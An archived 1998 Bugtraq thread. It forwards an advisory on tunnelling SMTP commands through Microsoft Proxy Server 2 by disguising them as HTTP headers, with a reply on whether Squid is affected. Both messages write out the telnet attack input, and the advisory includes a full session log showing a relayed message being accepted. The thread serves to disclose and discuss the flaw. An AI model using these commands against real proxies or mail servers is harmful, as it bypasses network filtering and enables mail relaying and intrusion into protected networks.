FW: WARNING: By-passing MS Proxy packet filtering

From: Jordan Mendelson <jordy@dont-contact.us>
Date: Fri, 9 Oct 1998 18:53:54 -0400

As far as I can tell, Squid is not vulnerable to this style exploit (to a
point). I was unable to pass a ^J through an HTTP header to get something on
it's own line (required for SMTP "." and anything else which will not allow

Can anyone confirm this? Standard attack would look like this:

# telnet squid 3128
GET http://mail.yourhost.com:25/ HTTP/1.0
helo yahoo.com :
mail from: someone@yahoo.com
rcpt to: someone@yourhost.com
data :

There is a similar gopher attack, however gopher is probably disabled on
everyone's Squid proxy :)


Jordan Mendelson     : http://jordy.wserv.com
Web Services, Inc.   : http://www.wserv.com
-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ@netspace.org] On Behalf Of Mnemonix
Sent: Wednesday, October 07, 1998 2:11 AM
To: BUGTRAQ@netspace.org
Subject: WARNING: By-passing MS Proxy packet filtering
Whilst playing around with Microsoft's Proxy Server 2, I came across an
interesting "feature" that could allow someone to by-pass packet filtering
if enabled.
The essence of the "exploit" is to connect to a remote host on a given port
- in the example provided I have used the SMTP port (25) - through the Web
Proxy Service.
What you attempt to do is disguise service-specific commands as HTTP
headers. Below is a log of a telnet session where I've telnetted to the Web
Proxy Service, made a GET request and passed off the SMTP commands as HTTP
headers :
GET http://smtpmail.globalnet.co.uk:25/ HTTP/1.0
mail from: me@here.com
rcpt to: mnemonix@globalnet.co.uk
data :
Subject: This is the Subject Line
 This is the body of the message. To get here do a Ctrl+J. To place a
single dot on a line do another Ctrl+J
220 sand2.global.net.uk ESMTP Exim 1.92 #1 Wed, 7 Oct 1998 06:51:37 +0100
500 Command unrecognized
500 Command unrecognized
500 Command unrecognized
250 <me@here.com> is syntactically correct
250 <mnemonix@globalnet.co.uk> is syntactically correct
354 Enter message, ending with "." on a line by itself
250 OK id=0zQmVd-0007md-00
500 Command unrecognized
500 Command unrecognized
If the packet filter only allows incoming HTTP requests and the Web-Proxy
Service gives Everybody access this could be used to gain entry to the
"protected" network.
This was tested on NT Server 4.0, Service Pack 3 with important hotfixes,
IIS 3.0 and MS Proxy 2.0
Received on Fri Oct 09 1998 - 15:56:32 MDT

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:42:24 MST